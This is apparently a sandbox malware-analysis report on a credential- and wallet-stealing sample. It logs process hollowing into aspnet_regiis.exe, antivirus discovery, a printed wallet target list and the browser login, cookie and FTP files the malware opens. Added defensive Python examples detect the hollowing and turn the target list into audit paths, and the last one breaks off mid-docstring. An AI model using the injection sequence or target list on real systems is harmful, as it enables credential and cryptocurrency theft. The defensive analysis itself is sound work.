Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A1D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_02A1D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A2762E SetUnhandledExceptionFilter, 3_2_02A2762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CA9B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6CA9B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CA9B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6CA9B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CC4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6CC4AC62
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5BABD0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory, 0_2_6D5BABD0
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 3_2_02A124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A1257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 3_2_02A1257F
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A01000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A30000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A3D000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C70000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C71000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29B5008 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" Jump to behavior
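Read together, the lines above describe a classic hollowing sequence: file.exe spawns aspnet_regiis.exe (a Microsoft .NET Framework binary, so the visible process looks benign), allocates an RWX region at 2A00000 in it, writes data beginning with 4D5A ("MZ", a PE header) to that same base, follows with writes to 2A01000, 2A30000, 2A3D000 and other regions, and the call chain at 0_2_6D5BABD0 shows the matching API pattern (CreateProcessW, Wow64GetThreadContext, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread). The Python below is an added example (not part of the report or the sample) that correlates these per-event lines into a single verdict per (injector, target) pair, the way a detection rule would join process-creation, remote-allocation and remote-write telemetry. The sample lines are copied from the report; the regexes, the verdict wording and the framework-path heuristic are the author's own.

```python
import re
from collections import defaultdict

# Constructed sample: the cross-process events copied from the report above.
EVENTS = [
    r"Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 protect: page execute and read and write Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 value starts with: 4D5A Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A01000 Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29B5008 Jump to behavior",
    r'Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" Jump to behavior',
]

SRC = r"^Source: (?P<src>\S+) "
ALLOC_RE = re.compile(SRC + r"Memory allocated: (?P<target>\S+) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+?)(?: Jump to behavior)?$")
WRITE_RE = re.compile(SRC + r"Memory written: (?P<target>\S+) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?")
PROC_RE = re.compile(SRC + r"Process created: (?P<target>\S+) ")


def is_framework_binary(path: str) -> bool:
    """Heuristic (author's assumption): anything under the .NET Framework directory is a trusted-looking host."""
    return path.lower().startswith(r"c:\windows\microsoft.net\framework")


def correlate(lines):
    """Group allocations, writes and process creation by (injector, target) and judge each pair."""
    rwx_bases = defaultdict(set)    # remote regions allocated executable+writable
    mz_bases = defaultdict(set)     # remote regions whose written data starts with "MZ"
    write_count = defaultdict(int)
    spawned = set()
    for line in lines:
        if m := ALLOC_RE.match(line):
            if "execute" in m["prot"] and "write" in m["prot"]:
                rwx_bases[(m["src"], m["target"])].add(int(m["base"], 16))
        elif m := WRITE_RE.match(line):
            key = (m["src"], m["target"])
            write_count[key] += 1
            if (m["magic"] or "").upper().startswith("4D5A"):  # a PE header landed in the target
                mz_bases[key].add(int(m["base"], 16))
        elif m := PROC_RE.match(line):
            spawned.add((m["src"], m["target"]))

    findings = []
    for key in sorted(set(rwx_bases) | set(mz_bases) | set(write_count) | spawned):
        src, target = key
        hollowed = rwx_bases[key] & mz_bases[key]   # PE written into memory the injector itself made RWX
        reasons = []
        if key in spawned:
            reasons.append("created the target process")
        if hollowed:
            reasons.append("wrote a PE header into RWX memory it allocated at "
                           + ", ".join(hex(b) for b in sorted(hollowed)))
        if write_count[key]:
            reasons.append(f"{write_count[key]} write(s) into the target's address space")
        if is_framework_binary(target):
            reasons.append("target is a Microsoft .NET Framework binary, i.e. a trusted host for the injected image")
        if hollowed and key in spawned:
            verdict = "process hollowing / PE injection into a child process"
        elif hollowed:
            verdict = "PE injection into an existing process"
        else:
            verdict = "cross-process memory access (review)"
        findings.append({"source": src, "target": target, "verdict": verdict, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in correlate(EVENTS):
        print(finding["verdict"], "->", finding["target"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

The join on (source, target, base) is what makes the verdict specific: a remote RWX allocation alone, or an MZ write alone, each has benign explanations, but the same process allocating RWX in a child it just created and then writing a PE header to exactly that base does not.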
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5CDBC8 cpuid 0_2_6D5CDBC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 3_2_02A10DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 3_2_02A2B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 3_2_02A2B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 3_2_02A29A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 3_2_02A253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 3_2_02A2AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_02A2B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 3_2_02A2B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: GetLocaleInfoA, 3_2_02A2E6A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 3_2_02A2B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 3_2_02A2B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 3_2_02A2749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_02A2B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_02A2B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 3_2_02A28DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 3_2_02A29D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 3_2_02A2E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_02A27576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: EnumSystemLocalesA, 3_2_02A2B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5CD64B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6D5CD64B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A10C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 3_2_02A10C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A10D2E GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 3_2_02A10D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
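The wallet string recovered from aspnet_regiis.exe memory is the stealer's target list in a flat pipe-delimited form: five fields per record (display name, root-directory code, sub-path, file mask, recurse flag), with no record terminator beyond the trailing separator. The Python below is an added example (not part of the report or the sample) that parses an excerpt of that string, turns each record into a watch path a defender can feed into file-access auditing, and answers whether a given file would be collected. The mapping of root codes to folders (1 = %APPDATA%, 0 = %LOCALAPPDATA%, 2 = %USERPROFILE%) is an assumption inferred from where Bitcoin Core, Coinomi and Chia actually keep their data; the report does not state it.

```python
import fnmatch
from dataclasses import dataclass
from typing import List

# Constructed excerpt of the pipe-delimited wallet list quoted above (7 of its records).
SAMPLE_CONFIG = (
    r"Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|"
    r"Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|"
    r"Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|"
    r"Exodus|1|\Exodus\backups\|*.*|1|"
    r"Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|"
    r"Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|"
    r"Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|"
)

# Assumption: root codes inferred from the real locations of the listed wallets.
ROOT_DIRS = {"0": "%LOCALAPPDATA%", "1": "%APPDATA%", "2": "%USERPROFILE%"}


@dataclass(frozen=True)
class WalletTarget:
    name: str
    root_code: str
    subdir: str
    file_mask: str
    recursive: bool

    def search_root(self) -> str:
        """Directory the stealer enumerates for this record, with the root code expanded."""
        root = ROOT_DIRS.get(self.root_code, f"<root {self.root_code}>")
        return root + self.subdir.rstrip("\\")


def parse_wallet_config(blob: str) -> List[WalletTarget]:
    """Split the flat string into 5-field records; refuse anything that is not a whole number of records."""
    fields = blob.split("|")
    if fields and fields[-1] == "":
        fields.pop()  # the list ends with a trailing separator
    if len(fields) % 5:
        raise ValueError(f"{len(fields)} fields is not a multiple of 5; format drifted?")
    return [WalletTarget(name, root, sub, mask, rec == "1")
            for name, root, sub, mask, rec in zip(*[iter(fields)] * 5)]


def would_collect(target: WalletTarget, path_under_root: str) -> bool:
    """Would this record pick up path_under_root (a path relative to the expanded root dir)?"""
    prefix = target.subdir.strip("\\").lower()
    path = path_under_root.strip("\\").lower()
    if not path.startswith(prefix + "\\"):
        return False
    rest = path[len(prefix) + 1:]
    # A non-recursive record only matches files directly inside subdir.
    if not rest or (not target.recursive and "\\" in rest):
        return False
    filename = rest.rsplit("\\", 1)[-1]
    return fnmatch.fnmatchcase(filename, target.file_mask.lower())


def audit_paths(targets) -> List[str]:
    """Root + subdir + mask strings, one per record, for a file-access audit or EDR watchlist."""
    return sorted({t.search_root() + "\\" + t.file_mask for t in targets})


if __name__ == "__main__":
    targets = parse_wallet_config(SAMPLE_CONFIG)
    for path in audit_paths(targets):
        print(path)
```

Generating the watch list from the stealer's own configuration is more reliable than hand-curating wallet paths: when a new build of the stealer adds a record, re-running the parser over the new string updates the list in one step.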
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match File source: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
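The detection-relevant point in the wallet sweep above is not the paths themselves but who opens them: aspnet_regiis.exe is a signed Microsoft .NET configuration utility that has no reason to enumerate Electrum, Exodus or Ledger Live data directories, which is consistent with the report's code-injection signatures. The following Python script is an added example, not part of the sandbox report or of Vidar. It takes file-open events, matches them against the wallet directories listed in the report, and flags any process image outside an allowlist of expected wallet applications. The allowlist of image names, the FileOpenEvent record shape and the sample events are assumptions constructed for the example; only the wallet paths and the aspnet_regiis.exe PID 1420 come from the report.

```python
"""
Added example (not part of the sandbox report): flag a process that opens
known cryptocurrency-wallet directories when it is not a wallet application.
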